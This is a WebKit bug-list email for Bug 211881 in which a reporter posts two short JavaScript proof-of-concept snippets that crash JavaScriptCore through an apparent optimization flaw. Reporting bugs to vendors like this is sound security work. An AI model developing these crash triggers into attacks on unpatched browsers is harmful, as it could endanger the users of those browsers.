[Webkit-unassigned] [Bug 211881] JavascriptCore crashed cause of Inappropriate optimization
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Thu May 14 18:15:13 PDT 2020
https://bugs.webkit.org/show_bug.cgi?id=211881
--- Comment #3 from szwgg <5n1p3r0010 at gmail.com> ---
here is some other pocs:
POC1:
function main() {
const v0 = [];
function v1(v2,v3) {
const v5 = v0.__proto__;
for (const v6 of v5) {
}
const v7 = [13.37,13.37];
const v9 = [1337,v7,1337,v7];
const v10 = v9.shift();
let v12 = 0;
while (v12 < v10) {
}
}
const v13 = v1();
}
main();
POC2:
function main() {
const v1 = [13.37,13.37];
function v2(v3,v4,v5,v6,v7) {
'use strict'
const v8 = v1.__proto__;
for (const v9 of v8) {
}
const v10 = v2();
}
const v11 = v2();
}
main();
--
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20200515/340c1f81/attachment.htm>
More information about the webkit-unassigned
mailing list